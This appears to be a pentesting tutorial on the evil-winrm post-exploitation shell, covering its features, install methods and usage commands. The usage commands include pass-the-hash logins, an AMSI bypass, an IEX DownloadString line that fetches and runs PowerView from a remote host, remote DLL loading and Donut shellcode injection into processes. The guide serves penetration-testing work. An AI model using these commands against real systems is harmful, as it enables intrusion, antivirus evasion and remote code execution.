WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.

WinRM typically uses port 5985 for HTTP and port 5986 for HTTPS communication. However, the tool allows you to specify the desired port during usage, offering flexibility based on network configurations and security considerations.

5985
5986

Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it’s utilising WMI, so you can think of it as an HTTP based API for WMI.

https://github.com/Hackplayers/evil-winrm

Features

Compatible to Linux and Windows client systems
Load in memory Powershell scripts
Load in memory dll files bypassing some AVs
Load in memory C# (C Sharp) assemblies bypassing some AVs
Load x64 payloads generated with awesome donut technique
Dynamic AMSI Bypass to avoid AV signatures
Pass-the-hash support
Kerberos auth support
SSL and certificates support
Upload and download files showing progress bar
List remote machine services without privileges
Command History
WinRM command completion
Local files/directories completion
Remote path (files/directories) completion (can be disabled optionally)
Colorization on prompt and output messages (can be disabled optionally)
Optional logging feature
Docker support (prebuilt images available at Dockerhub)
Trap capturing to avoid accidental shell exit on Ctrl+C

Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2, logger >= 1.4.3, fileutils >= 0.7.2. Depending of your installation method (4 availables) the installation of them could be required to be done manually.

Another important requirement only used for Kerberos auth is to install the Kerberos package used for network authentication. For some Linux like Debian based (Kali, Parrot, etc.) it is called krb5-user. For BlackArch it is called krb5 and probably it could be called in a different way for other Linux distributions.

Installation & Quick Start (4 methods)

Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system)

Step 1. Install it (it will install automatically dependencies):

gem install evil-winrm

Step 2. Ready. Just launch it!

evil-winrm -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’

Method 2. Git clone and install dependencies on your system manually

Step 1. Install dependencies manually:

sudo gem install winrm winrm-fs stringio logger fileutils

Step 2. Clone the repo:

git clone https://github.com/Hackplayers/evil-winrm.git

Step 3. Ready. Just launch it!

cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’

Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm)

Step 1. Install bundler:

gem install bundler

Step 2. Clone the repo:

git clone https://github.com/Hackplayers/evil-winrm.git

Step 3. Install dependencies with bundler:

cd evil-winrm && bundle install –path vendor/bundle

Step 4. Launch it with bundler:

bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’

Method 4. Using Docker

Step 1. Launch docker container based on already built image:

docker run –rm -ti –name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/ps1_scripts/’ -e ‘/exe_files/’

How to use

1. Display help menu

evil-winrm –help

Note: Notice the tool version at the top.

2. Log in using one of the accounts username/password

evil-winrm -u admin1 -p Admin.123 -i 192.168.0.110

3. Connect using pass the hash

evil-winrm –ip [ip] –user [user] –hash [nt_hash]

4. Display the console menu, and bypass AMSI

Windows AMSI (Antimalware Scan Interface): A Microsoft security feature that allows applications and scripts to be scanned for malicious content in real-time by interfacing with antivirus and antimalware products.

menu
Bypass-4MSI

5. Connect to a host, specifying directories for scripts and executables

evil-winrm –ip [ip] –user [user] –password [password] –scripts [path/to/scripts] –executables [path/to/executables]

SSL

1. Connect to a host, using SSL

evil-winrm –ip [ip] –user [user] –password [password] –ssl –pub-key [path/to/pubkey] –priv-key [path/to/privkey]

Upload Download files

1. Upload files

upload [path/to/local/file] [path/to/remote/file]
upload /home/kali/secret.txt C:\Users\admin1\Documents\secret.txt

2. Download files

download [path/to/local/file] [path/to/remote/file]
download C:\Users\admin1\Documents\Server_Secret.txt /home/kali/Server_Secret.txt

Import Powershell scripts

1. To load a powershell script download the script into the remote computer, display the menu and see all the methods/modules imported

IEX(New-Object Net.WebClient).DownloadString(‘http://192.168.0.10:9999/PowerView.ps1’)
menu

2. Run the modules

Get-Domain

3. (OPTIONAL) We can also log in specifying a local script folder, so, you just need to call it, without downloading it from the local machine

evil-winrm -u admin1 -p Admin.123 -i 192.168.0.110 -s ~/Documents/Tools/PowerSploit/Recon
PowerView.ps1

Import DLL

1. Import DLL

Dll-Loader
Dll-Loader -smb -path \\192.168.139.132\\share\\myDll.dll
Dll-Loader -local -path C:\Users\Pepito\Desktop\myDll.dll
Dll-Loader -http -path http://example.com/myDll.dll

Note: To call the scripts

[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()

Import Binary

1. Invoke a binary on the host from the –executables directory

Invoke-Binary
Invoke-Binary /opt/csharp/Watson.exe
Invoke-Binary /opt/csharp/Binary.exe param1,param2,param3
Invoke-Binary /opt/csharp/Binary.exe ‘param1, param2, param3’

Import Donut payloads

1. Donut-Loader: allows to inject x64 payloads generated with awesome donut technique. No need to encode the payload.bin, just generate and inject! (https://github.com/TheWover/donut)

Donut-Loader
Donut-Loader -process_id 2195 -donutfile /home/cybervaca/donut.bin
Donut-Loader -process_id (get-process notepad).id -donutfile /home/cybervaca/donut.bin